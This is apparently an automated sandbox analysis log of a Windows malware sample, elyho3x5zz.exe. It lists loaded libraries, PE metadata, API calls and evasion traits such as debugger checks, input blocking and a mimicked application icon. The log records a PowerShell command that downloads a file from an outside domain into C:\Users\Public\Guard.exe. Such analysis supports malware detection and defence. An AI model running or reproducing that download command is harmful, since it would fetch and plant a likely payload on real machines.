Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: elyho3x5zz.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: elyho3x5zz.exeStatic file information: File size 1083904 > 1048576
Source: elyho3x5zz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: elyho3x5zz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: elyho3x5zz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: elyho3x5zz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: elyho3x5zz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: elyho3x5zz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: elyho3x5zz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: elyho3x5zz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: elyho3x5zz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: elyho3x5zz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: elyho3x5zz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: elyho3x5zz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: elyho3x5zz.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\elyho3x5zz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\Desktop\elyho3x5zz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe""Jump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2432F4 LoadLibraryA,GetProcAddress,0_2_00007FF73A2432F4
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A207399 push rdi; ret 0_2_00007FF73A2073A2
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2078FD push rdi; ret 0_2_00007FF73A207904

Hooking and other Techniques for Hiding and Protection

barindex
Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (132).png
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1F4514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00007FF73A1F4514
Source: C:\Users\user\Desktop\elyho3x5zz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5440Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3141Jump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeAPI coverage: 3.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1216Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7156Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF73A24C7C0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF73A24BC70
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2571F4 FindFirstFileW,FindClose,0_2_00007FF73A2571F4
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2572A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF73A2572A8
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF73A24B7C0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A212F50 FindFirstFileExW,0_2_00007FF73A212F50
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A25A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF73A25A350
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A256428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF73A256428
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A25A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF73A25A4F8
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A25A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF73A25A874
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1F1D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF73A1F1D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A260A00 BlockInput,0_2_00007FF73A260A00
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1D37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF73A1D37B0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1F5BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF73A1F5BC0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2432F4 LoadLibraryA,GetProcAddress,0_2_00007FF73A2432F4
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A23D408 LookupPrivilegeValueW,GetProcessHeap,HeapFree,0_2_00007FF73A23D408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1F59C8 SetUnhandledExceptionFilter,0_2_00007FF73A1F59C8
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1F57E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73A1F57E4
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A20AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73A20AF58
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A218FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF73A218FE4
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A23CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00007FF73A23CE68
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1D37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF73A1D37B0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A249420 SendInput,keybd_event,0_2_00007FF73A249420
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24D158 mouse_event,0_2_00007FF73A24D158
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A23C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00007FF73A23C858
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A23D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00007FF73A23D540
Source: elyho3x5zz.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: elyho3x5zz.exeBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A20FD20 cpuid 0_2_00007FF73A20FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24DC1C GetLocalTime,0_2_00007FF73A24DC1C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A232BCF GetUserNameW,0_2_00007FF73A232BCF
